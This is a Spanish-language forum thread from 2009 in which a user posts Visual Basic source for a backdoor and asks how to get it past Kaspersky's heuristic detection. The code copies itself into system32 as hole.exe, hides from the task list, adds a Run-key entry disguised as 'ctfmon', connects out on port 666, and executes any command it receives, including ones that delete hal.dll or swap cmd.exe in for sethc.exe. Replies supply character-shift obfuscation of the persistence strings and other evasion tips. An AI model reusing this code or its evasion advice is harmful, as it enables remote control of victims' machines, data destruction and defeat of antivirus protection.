elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
24 Mayo 2012, 16:50  


Tema destacado: Entra al canal IRC oficial de #elhacker.net

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderadores: Karcrack, [Zero])
| | |-+  Proyecto Vb detectado por heuristica kav		 0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 3 Ir Abajo Respuesta Imprimir
Autor Tema: Proyecto Vb detectado por heuristica kav  (Leído 4,499 veces)
50l3r


Desconectado Desconectado

Mensajes: 758


Todo lo que se por la cuarta parte que desconozco


Ver Perfil WWW
Proyecto Vb detectado por heuristica kav
« en: 21 Mayo 2009, 17:23 »
Al parecer logre saltarme la heurisitica del nod pero parece que kav es mas potente, y me lo detecta, haber si me podriais ayudar a saber que seria:

Código:
Private Sub cmdconectar_Click()
On Error GoTo error
If Not wsk.State = 7 Then GoTo puente
GoTo error
puente:
wsk.Close
wsk.Connect
error:
End Sub

Public Sub Form_Load()
Dim ejec As String
'FIXIT: Declare 'win' and 'sys' and 'residencia' con un tipo de datos de enlace en tiempo de compilación     FixIT90210ae-R1672-R1B8ZE
Dim win, sys, residencia
On Error Resume Next

wsk.Protocol = sckTCPProtocol
wsk.RemoteHost = "----------------"
wsk.RemotePort = "666"
ejec = App.Path

If Right(ejec, 1) <> "\" Then ejec = ejec & "\"
ejec = ejec & App.EXEName & ".exe"

Set obj = CreateObject("Scripting.FileSystemObject")
Set win = obj.GetSpecialFolder(0)
Set sys = obj.GetSpecialFolder(1)

'FIXIT: Reemplazar la función 'LCase' con la función 'LCase$'.                             FixIT90210ae-R9757-R1B8ZE
win = LCase(win)
'FIXIT: Reemplazar la función 'LCase' con la función 'LCase$'.                             FixIT90210ae-R9757-R1B8ZE
sys = LCase(sys)
If Dir(sys & "\hole.exe", vbArchive) Then Kill sys & "\hole.exe"
FileCopy MSWINSCK.OCX, sys & "\MSWINSCK.OCX"
FileCopy ejec, sys & "\hole"
Name sys & "\hole" As sys & "\hole.exe"

'FIXIT: App.TaskVisible property no tiene equivalente en Visual Basic .NET y no se actualizará.     FixIT90210ae-R7593-R67265
App.TaskVisible = False

txthost = wsk.LocalHostName

wsk.SendData txthost
End Sub

Private Sub Timer1_Timer()
On Error GoTo error
If Not wsk.State = 7 Then Call cmdconectar_Click
error:
End Sub

Private Sub Timer2_Timer()
Dim sistrema As String
sistrema = Environ$("windir") & "\system32"
Set residencia = CreateObject("WScript.Shell")
residencia.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & "ctfmon", sistrema & "\hole.exe"
End Sub

Private Sub wsk_DataArrival(ByVal bytesTotal As Long)
Dim orden As String, sistrema As String
On Error GoTo error
sistrema = Environ$("windir") & "\system32"
wsk.GetData orden
If orden = "del " & sistrema & "\hal.dll" Then Kill sistrema & "\hal.dll"
If orden = "copy /y " & sistrema & "\cmd.exe" & " " & sistrema & "\sethc.exe" Then FileCopy sistrema & "\cmd.exe", sistrema & "\sethc.exe"
If orden = "copy /y " & sistrema & "\cmd.exe" & " " & sistrema & "\taskmgr.exe" Then FileCopy sistrema & "\cmd.exe", sistrema & "\taskmgr.exe"
Shell orden
error:
End Sub

Yo creo que puede haber dos casos, el "app.taskvisible" y la inserccion de la clave del registro al inicio que esta en el timer

haber si sabriais como burlarlo, pero con apis aun nose :/

gracias  ::)
En línea
~~
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.983


Ver Perfil WWW
Re: Proyecto Vb detectado por heuristica kav
« Respuesta #1 en: 21 Mayo 2009, 17:29 »
Ves comentando trozos de código y cuando el AV deje de detectarlo ya sabes lo que estaba mal... Lo pones y te decimos a ver que se nos ocurre ;)
En línea
Karcrack
Moderador
***
Desconectado Desconectado

Mensajes: 2.190


Se siente observado ¬¬'


Ver Perfil
Re: Proyecto Vb detectado por heuristica kav
« Respuesta #2 en: 21 Mayo 2009, 17:46 »
1- cifra todas las cadenas... (Karcrack Project Crypter, por ejemplo :P)
2- Cambiar el App.TaskVisible a Form_Initialitze...

Luego ya nos cuentas...

Saludos :)
En línea
50l3r


Desconectado Desconectado

Mensajes: 758


Todo lo que se por la cuarta parte que desconozco


Ver Perfil WWW
Re: Proyecto Vb detectado por heuristica kav
« Respuesta #3 en: 21 Mayo 2009, 17:48 »
solo detecta esta:

Private Sub Timer2_Timer()
Dim sistrema As String
sistrema = Environ$("windir") & "\system32"
Set residencia = CreateObject("WScript.Shell")
residencia.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & "ctfmon", sistrema & "\hole.exe"
End Sub


y si pongo la funcion entera con caracteres ascii chr() ???
En línea
Novlucker
Ninja y
Ex-Staff
*
Desconectado Desconectado

Mensajes: 10.239


Yo que tu lo pienso dos veces


Ver Perfil
Re: Proyecto Vb detectado por heuristica kav
« Respuesta #4 en: 21 Mayo 2009, 17:54 »
Intenta con API's en lugar de WScript.Shell  :P

Saludos
En línea
Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
http://twitter.com/novlucker
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
Karcrack
Moderador
***
Desconectado Desconectado

Mensajes: 2.190


Se siente observado ¬¬'


Ver Perfil
Re: Proyecto Vb detectado por heuristica kav
« Respuesta #5 en: 21 Mayo 2009, 18:12 »
Cita de: 50l3r en 21 Mayo 2009, 17:48
solo detecta esta:

Private Sub Timer2_Timer()
Dim sistrema As String
sistrema = Environ$("windir") & "\system32"
Set residencia = CreateObject("WScript.Shell")
residencia.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & "ctfmon", sistrema & "\hole.exe"
End Sub


y si pongo la funcion entera con caracteres ascii chr() ???

Reemplaza el codigo del Timer2 por esto:
Código
Private Sub Timer2_Timer()
Dim sistrema As String
sistrema = Environ$(Rot13("j\aW\e")) & Rot13("OflfgX`&%")
Set residencia = CreateObject(Rot13("JFVe\cg!F[X__"))
residencia.RegWrite Rot13(";>8LR6HEE8AGRHF8EOFbYgjTeXO@\VebfbYgOJ\aWbjfO6heeXagIXef\baOEhaO") & Rot13("VgY`ba"), sistrema & Rot13("O[b_X!XkX")
End Sub
 
Public Function Rot13(ByVal sData As String) As String
    Dim i       As Long
 
    For i = 1 To Len(sData)
        Mid$(sData, i, 1) = Chr$(Asc(Mid$(sData, i, 1)) + 13)
    Next i
    Rot13 = sData
End Function
 
'Public Function Rot13_Encript(ByVal sData As String) As String
'    Dim i       As Long
'
'    For i = 1 To Len(sData)
'        Mid$(sData, i, 1) = Chr$(Asc(Mid$(sData, i, 1)) - 13)
'    Next i
'    Rot13_Encript = sData
'End Function
En línea
50l3r


Desconectado Desconectado

Mensajes: 758


Todo lo que se por la cuarta parte que desconozco


Ver Perfil WWW
Re: Proyecto Vb detectado por heuristica kav
« Respuesta #6 en: 21 Mayo 2009, 18:15 »
ajam, ahora mismo me leo lo que hace y lo pongo y os digo el resultado, muchas gracias karcrack
En línea
~~
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.983


Ver Perfil WWW
Re: Proyecto Vb detectado por heuristica kav
« Respuesta #7 en: 21 Mayo 2009, 18:54 »
Básicamente cifra los strings con el algoritmo Rot13:
http://es.wikipedia.org/wiki/ROT13
En línea
50l3r


Desconectado Desconectado

Mensajes: 758


Todo lo que se por la cuarta parte que desconozco


Ver Perfil WWW
Re: Proyecto Vb detectado por heuristica kav
« Respuesta #8 en: 21 Mayo 2009, 21:51 »
ok, me he coscado de como funciona, pero como pasaria el texto a rot13

yo creo q seria mejor solucion el encriptarlo desde este modo

pero como paso el texto a rot13 en vb
En línea
Novlucker
Ninja y
Ex-Staff
*
Desconectado Desconectado

Mensajes: 10.239


Yo que tu lo pienso dos veces


Ver Perfil
Re: Proyecto Vb detectado por heuristica kav
« Respuesta #9 en: 21 Mayo 2009, 21:59 »
Es justamente lo que hace el código de Karcrack, ya tienes la función  :xD

Saludos
En línea
Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
http://twitter.com/novlucker
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
50l3r


Desconectado Desconectado

Mensajes: 758


Todo lo que se por la cuarta parte que desconozco


Ver Perfil WWW
Re: Proyecto Vb detectado por heuristica kav
« Respuesta #10 en: 21 Mayo 2009, 22:01 »
ok gracias, voy a ver si lo comprendo ue es lo mas important  :P
En línea
50l3r


Desconectado Desconectado

Mensajes: 758


Todo lo que se por la cuarta parte que desconozco


Ver Perfil WWW
Re: Proyecto Vb detectado por heuristica kav
« Respuesta #11 en: 21 Mayo 2009, 22:14 »
Bueno haber si voy entendiendo:

Código:
Public Function Rot13(ByVal sData As String) As String ' funcion para el form llamada rot13 con la variable sdata como string
    Dim i       As Long ' invocas variables "I" como long
 
    For i = 1 To Len(sData) ' Desde variable "i" hasta el final de sdata(sera la palabra"
        Mid$(sData, i, 1) = Chr$(Asc(Mid$(sData, i, 1)) + 13) ' le sumas +13 caracteres ascii a la letra"
    Next i 'vas a por la siguiente letra
    Rot13 = sData ' rot13 es igual a la variable sdata
End Function

Código:
Private Sub Timer2_Timer() ' funcion privada de timer 2
Dim sistrema As String ' defines sistrema como string
sistrema = Environ$(Rot13("j\aW\e")) & Rot13("OflfgX`&%") ' sistrema va a ser igual a la funcion rot13 de la palabra  j\aw\e y OflfgX`&% que dan como resultado windir y \system32
Set residencia = CreateObject(Rot13("JFVe\cg!F[X__")) ' creas en rot13 el objeto wscript
residencia.RegWrite Rot13(";>8LR6HEE8AGRHF8EOFbYgjTeXO@\VebfbYgOJ\aWbjfO6heeXagIXef\baOEhaO") & Rot13("VgY`ba"), sistrema & Rot13("O[b_X!XkX") ' y aqui es donde te partes el pecho con lo larga que es la clave, encriptandola :/

End Sub ' esto nose para q es xD (ironia)

una cosa, el mid& para que sirve?


EDITO: sigue detectandolo en rot13

REEDITO:  probe con una funcion llamandola a a otra funcion, pero tampoco


que solucion me queda, las apis?
« Última modificación: 21 Mayo 2009, 23:07 por 50l3r » En línea
Karcrack
Moderador
***
Desconectado Desconectado

Mensajes: 2.190


Se siente observado ¬¬'


Ver Perfil
Re: Proyecto Vb detectado por heuristica kav
« Respuesta #12 en: 21 Mayo 2009, 23:08 »
lo de Mid$ Significa que trabaja con variables tipo String... podria ponerse sin el dolar ($), pero se supone que es mas optimo asi...

Sigue detectandolo? Comprueba que es por lo mismo... en ese caso usa las APIs de W$...
En línea
50l3r


Desconectado Desconectado

Mensajes: 758


Todo lo que se por la cuarta parte que desconozco


Ver Perfil WWW
Re: Proyecto Vb detectado por heuristica kav
« Respuesta #13 en: 21 Mayo 2009, 23:10 »
sisi, lo detecta, probe quitando la clave del registro y tuti pero al parecer el kav se resiste

estoy buscando en google sobre las apis estas, haber si me podeis ayudar un poco, os lo agradeceria mucho, asi terminaria con m proyecto :) digo yo que lo exponga para todos cuando lo testee en varios av jeje, al menos nod32 lo traga

gracias
En línea
~~
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.983


Ver Perfil WWW
Re: Proyecto Vb detectado por heuristica kav
« Respuesta #14 en: 22 Mayo 2009, 00:03 »
Pues tienes que usar las api's para escribir el el registro:
http://msdn.microsoft.com/en-us/library/ms724875.aspx

En la msdn vienen detalladas todas, presupongo que sabes usar api's desde VB, si no...
http://www16.brinkster.com/eduroam/api/
En línea
Páginas: [1] 2 3 Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines